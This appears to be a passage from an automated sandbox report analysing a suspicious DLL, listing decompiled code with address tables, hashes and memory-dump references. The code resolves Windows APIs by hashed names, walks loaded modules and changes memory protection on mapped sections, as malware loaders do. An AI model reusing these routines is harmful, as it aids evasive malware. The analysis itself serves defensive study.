				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6FC503A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6fc5d208 == 0 ||  *0x6fc5d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6FC54BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6fc5d2ec |  *0x6fc5d2ed;
									if(( *0x6fc5d2ec |  *0x6fc5d2ed) == 0) {
										_t525 =  *0x6fc5d208; // 0x4ec1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6fc5d2ec = 1;
											_t526 = E6FC53558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6FC51CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6fc5d208 = _t526;
											 *0x6fc5d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6FC53558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6FC51CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6FC4E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6FC4E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x6fc5d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x6fc5d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6FC4E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6FC52F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6fc5d2e4 = 1;
					E6FC4F620( &(_t535[0x38]), 0);
					E6FC4F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6FC4F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6FC52F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6FC4F8C4( &(_t535[0xc]), E6FC4F568( &(_t535[8])) + 0x14);
								_t369 = E6FC4F558( &(_t535[0xc]), E6FC4F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6FC4F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6FC4F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6FC4F6F0( &(_t535[8]));
							E6FC4F6F0( &(_t535[0x164]));
							E6FC4F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6FC4F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E6FC51DD0(0xa5eabdf8);
							_t290 = E6FC51388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6FC51D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E6FC4D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6FC55C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6FC55C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6FC58D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6FC4F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6FC4BC00( &(_t535[0x110]));
							}
							E6FC4D098( &(_t535[0x104]));
							E6FC4D098(_t518);
							E6FC4D098( &(_t535[0x15c]));
							E6FC4D098( &(_t535[0x154]));
							E6FC59058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6FC4F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6FC5901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6FC4F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6FC4F568( &(_t535[0x44]));
								_t519 =  *(0x6fc5bce0 + _t381 * 4);
								_t531 = E6FC58FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6FC58754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6FC4F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6FC4F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6FC4F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6FC4F8C4( &(_t535[0x20]), E6FC4F568( &(_t535[0x1c])) + 8);
										E6FC4F558( &(_t535[0x20]), E6FC4F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6FC530A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6FC4F8C4( &(_t535[0x48]), _t535[0x70]);
									E6FC530A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6FC4F8DC( &(_t535[0x44]), _t563);
									E6FC4F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6FC590A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6FC59070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6FC4F6F0( &(_t535[0x144]));
									E6FC4F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x6fc5d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6FC4F6F0( &(_t535[0x11c]));
							E6FC58DD4(_t381,  &(_t535[0xd8]));
							E6FC4F6F0( &(_t535[0x1c]));
							E6FC4F6F0( &(_t535[0x44]));
							E6FC4F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6FC4F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6FC4F8C4( &(_t535[0x38]), E6FC4F568( &(_t535[0x34])) + 0x14);
							_t347 = E6FC4F558( &(_t535[0x38]), E6FC4F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6FC4F558( &(_t535[0xc]), _t62);
						_t455 = E6FC4F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6fc514e4
0x6fc514eb
0x6fc514ee
0x6fc514f5
0x6fc51c77
0x6fc51c77
0x6fc514fb
0x6fc51506
0x6fc51a45
0x6fc51a49
0x00000000
0x6fc51cc8
0x6fc51a4f
0x6fc51a52
0x6fc51a55
0x6fc51a5f
0x6fc51a6e
0x6fc51a70
0x6fc51a77
0x6fc51c61
0x6fc51c63
0x6fc51c66
0x6fc51c6a
0x00000000
0x6fc51c6a
0x6fc51a86
0x6fc51a91
0x6fc51a98
0x6fc51a9b
0x6fc51a9d
0x6fc51aa0
0x6fc51aa3
0x6fc51aa9
0x6fc51ab7
0x6fc51ac7
0x6fc51aec
0x6fc51afd
0x6fc51b00
0x6fc51b02
0x6fc51b66
0x6fc51b69
0x6fc51b69
0x6fc51b6b
0x6fc51b6e
0x6fc51b72
0x6fc51b72
0x6fc51b76
0x00000000
0x00000000
0x6fc51b83
0x6fc51b89
0x6fc51bbd
0x6fc51bc3
0x6fc51bc5
0x6fc51c94
0x6fc51c9c
0x6fc51c9f
0x6fc51ca1
0x6fc51cb8
0x6fc51cb8
0x6fc51ca3
0x6fc51ca7
0x6fc51cac
0x6fc51cac
0x6fc51cba
0x6fc51cc0
0x6fc51bdf
0x6fc51bdf
0x6fc51be1
0x6fc51be1
0x6fc51be3
0x6fc51be3
0x6fc51be8
0x00000000
0x00000000
0x6fc51bea
0x6fc51beb
0x6fc51bee
0x6fc51bf1
0x00000000
0x00000000
0x6fc51bfd
0x6fc51c00
0x6fc51c02
0x6fc51c19
0x6fc51c19
0x6fc51c04
0x6fc51c08
0x6fc51c0d
0x6fc51c0d
0x6fc51c26
0x6fc51c29
0x6fc51c32
0x6fc51c35
0x6fc51c58
0x6fc51c5c
0x00000000
0x6fc51c5c
0x6fc51c3d
0x6fc51c3d
0x6fc51c49
0x6fc51c4c
0x6fc51c55
0x00000000
0x6fc51c55
0x6fc51bcb
0x6fc51bdb
0x6fc51bdb
0x6fc51bdd
0x00000000
0x00000000
0x6fc51bd3
0x6fc51bd5
0x6fc51bd5
0x00000000
0x6fc51bdb
0x6fc51b8b
0x6fc51b93
0x6fc51bb3
0x6fc51b95
0x6fc51b95
0x6fc51b9d
0x6fc51ba6
0x6fc51ba6
0x6fc51b9d
0x00000000
0x6fc51b93
0x6fc51b04
0x6fc51b0b
0x00000000
0x00000000
0x6fc51b18
0x6fc51b1e
0x6fc51b23
0x6fc51b2a
0x6fc51b2e
0x6fc51b43
0x6fc51b45
0x6fc51b47
0x6fc51b4d
0x6fc51b5b
0x6fc51b5b
0x6fc51b61
0x00000000
0x6fc51b61
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc51aab
0x6fc51aab
0x6fc51aab
0x6fc51aac
0x6fc51aaf
0x6fc51ab3
0x00000000
0x6fc51ac9
0x6fc51acc
0x6fc51acf
0x6fc51ad8
0x6fc51adb
0x6fc51adc
0x6fc51ade
0x00000000
0x6fc51519
0x6fc5151b
0x6fc51520
0x6fc5152b
0x6fc51539
0x6fc5154c
0x6fc51559
0x6fc51562
0x6fc51566
0x6fc5156a
0x6fc515b2
0x6fc515b2
0x6fc515b4
0x6fc515bb
0x00000000
0x00000000
0x6fc515d4
0x6fc515dc
0x6fc515e0
0x6fc515f5
0x6fc515f9
0x6fc515fd
0x6fc51606
0x6fc5160c
0x6fc5160f
0x6fc51613
0x6fc5161b
0x6fc5161d
0x6fc51621
0x6fc51628
0x6fc51631
0x6fc51631
0x6fc51635
0x6fc5164a
0x6fc51660
0x6fc5166d
0x6fc5166e
0x6fc5166e
0x6fc51670
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc5162a
0x6fc5162a
0x6fc5162a
0x6fc5162b
0x6fc5162c
0x00000000
0x6fc5162a
0x6fc515ef
0x6fc515f3
0x00000000
0x00000000
0x00000000
0x6fc51674
0x6fc51674
0x6fc51675
0x6fc51678
0x6fc51682
0x6fc51682
0x6fc51686
0x6fc5168d
0x6fc516e8
0x6fc516ed
0x6fc51740
0x6fc51740
0x6fc51744
0x6fc51748
0x6fc51572
0x6fc51575
0x6fc5157a
0x6fc51580
0x6fc51583
0x6fc5158a
0x6fc5158e
0x6fc51595
0x6fc5159e
0x6fc515a2
0x6fc515a6
0x6fc515ac
0x00000000
0x00000000
0x00000000
0x6fc515ac
0x6fc51752
0x6fc5175e
0x6fc51769
0x6fc51770
0x6fc51779
0x6fc51783
0x6fc51784
0x6fc51792
0x6fc51797
0x6fc51798
0x6fc517a5
0x6fc517aa
0x6fc517bc
0x6fc517c1
0x6fc517c6
0x6fc517d8
0x6fc517ea
0x6fc517ef
0x6fc517fa
0x6fc51801
0x6fc51806
0x6fc5180e
0x6fc51817
0x6fc51817
0x6fc51823
0x6fc5182a
0x6fc51836
0x6fc51842
0x6fc51850
0x6fc51861
0x6fc51868
0x6fc5186d
0x6fc51876
0x6fc5187b
0x6fc5187d
0x6fc51881
0x6fc51885
0x6fc51892
0x6fc5189f
0x6fc518a3
0x6fc518b7
0x6fc518bb
0x00000000
0x00000000
0x6fc518d0
0x6fc518d2
0x6fc518da
0x6fc518d7
0x6fc518d7
0x6fc518d7
0x6fc518de
0x6fc518e0
0x6fc518e6
0x6fc518ec
0x6fc51948
0x6fc51951
0x6fc51955
0x6fc51962
0x6fc5196b
0x6fc51970
0x6fc51974
0x6fc51977
0x6fc519d8
0x6fc519ee
0x6fc519f9
0x6fc519fa
0x6fc519fb
0x6fc519ff
0x6fc51a02
0x6fc51c82
0x6fc51c85
0x6fc51c85
0x00000000
0x6fc51a02
0x6fc51981
0x6fc51991
0x6fc5199a
0x6fc519a3
0x6fc519ac
0x6fc519ad
0x6fc519ae
0x6fc519b3
0x6fc519bb
0x6fc519c3
0x00000000
0x00000000
0x00000000
0x6fc519c5
0x6fc518f5
0x6fc518fa
0x6fc518fe
0x6fc518fe
0x6fc51902
0x6fc51905
0x00000000
0x00000000
0x6fc51926
0x6fc51928
0x6fc5192c
0x6fc5192e
0x00000000
0x00000000
0x6fc51930
0x6fc51937
0x6fc51943
0x00000000
0x6fc51943
0x6fc5190a
0x00000000
0x6fc51a08
0x6fc51a08
0x6fc51a09
0x6fc51a19
0x6fc51a25
0x6fc51a2e
0x6fc51a37
0x6fc51a40
0x00000000
0x6fc51a40
0x6fc516ef
0x6fc516f1
0x6fc516f3
0x6fc516f8
0x6fc516fd
0x6fc51710
0x6fc51726
0x6fc5172f
0x6fc51730
0x6fc51730
0x6fc51732
0x6fc51733
0x6fc51736
0x6fc5173a
0x00000000
0x6fc516f3
0x6fc5168f
0x6fc51699
0x6fc5169a
0x6fc5169a
0x6fc516a7
0x6fc516b3
0x6fc516b5
0x6fc516b7
0x6fc516bb
0x6fc516cb
0x6fc516cb
0x6fc516d2
0x6fc516d5
0x6fc516d6
0x6fc516da
0x6fc516e4
0x00000000
0x6fc516e4

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5710ef01b43a41984417af478e2bec71f2aa80a75b0eacd72c69943116a5efd
Instruction ID: 47386afd9dcc5ede55ae3d3fe1667331465aa7e1e32a106b0129ce132690a690
Opcode Fuzzy Hash: a5710ef01b43a41984417af478e2bec71f2aa80a75b0eacd72c69943116a5efd
Instruction Fuzzy Hash: F33288705083458FD714DF68C880AAEB7F4FF95308F508A2DE5958B2A0FB31E969CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6FC46DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC46DC8() {

				 *0x6fc5d280 = GetUserNameW;
				 *0x6FC5D284 = MessageBoxW;
				 *0x6FC5D288 = GetLastError;
				 *0x6FC5D28C = CreateFileA;
				 *0x6FC5D290 = DebugBreak;
				 *0x6FC5D294 = FlushFileBuffers;
				 *0x6FC5D298 = FreeEnvironmentStringsA;
				 *0x6FC5D29C = GetConsoleOutputCP;
				 *0x6FC5D2A0 = GetEnvironmentStrings;
				 *0x6FC5D2A4 = GetLocaleInfoA;
				 *0x6FC5D2A8 = GetStartupInfoA;
				 *0x6FC5D2AC = GetStringTypeA;
				 *0x6FC5D2B0 = HeapValidate;
				 *0x6FC5D2B4 = IsBadReadPtr;
				 *0x6FC5D2B8 = LCMapStringA;
				 *0x6FC5D2BC = LoadLibraryA;
				 *0x6FC5D2C0 = OutputDebugStringA;
				return 0x6fc5d280;
			}

0x6fc46dd9
0x6fc46de1
0x6fc46de4
0x6fc46df3
0x6fc46df6
0x6fc46e05
0x6fc46e08
0x6fc46e17
0x6fc46e1a
0x6fc46e29
0x6fc46e2c
0x6fc46e3b
0x6fc46e3e
0x6fc46e4d
0x6fc46e50
0x6fc46e5f
0x6fc46e62
0x6fc46e65

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd5a3ce3b53e6859efbbffc66d44708e6bb0f728382fcb3e468d0aca153d099
Instruction ID: 9bb4a1deb527d259594db66cd640d61f745bff524c968fea26c4ef2e3c392d24
Opcode Fuzzy Hash: 8cd5a3ce3b53e6859efbbffc66d44708e6bb0f728382fcb3e468d0aca153d099
Instruction Fuzzy Hash: CB11E3B4925A02CFCB48CF0BD1908517BF1BBCD320351819ADA0A5B365D734D879CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6FC4BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6FC4BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6FC4C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E6FC52F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x6fc4bc01
0x6fc4bc03
0x6fc4bc0a
0x6fc4bc29
0x6fc4bc2a
0x6fc4bc0c
0x6fc4bc16
0x6fc4bc1d
0x6fc4bc23
0x00000000
0x6fc4bc1f
0x6fc4bc1f
0x6fc4bc21
0x6fc4bc22
0x6fc4bc22
0x6fc4bc1d

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 84553b011548a7697762b45092284c9ec6a17cc284631331183a3414f80c34b5
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: 1ED0227200020262EF084734BD00B88E3D88FC1108F10081654002B0A9EFA2C0250020

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7108 Parent PID: 6972 rundll32.exeCOMMON

Executed Functions

Function 02FE2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02FE2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x2fe4418 = 1;
				asm("movaps xmm0, [0x2fe3010]");
				asm("movups [0x2fe4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E02FE2569();
				E02FE1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E02FE2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x2fe4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
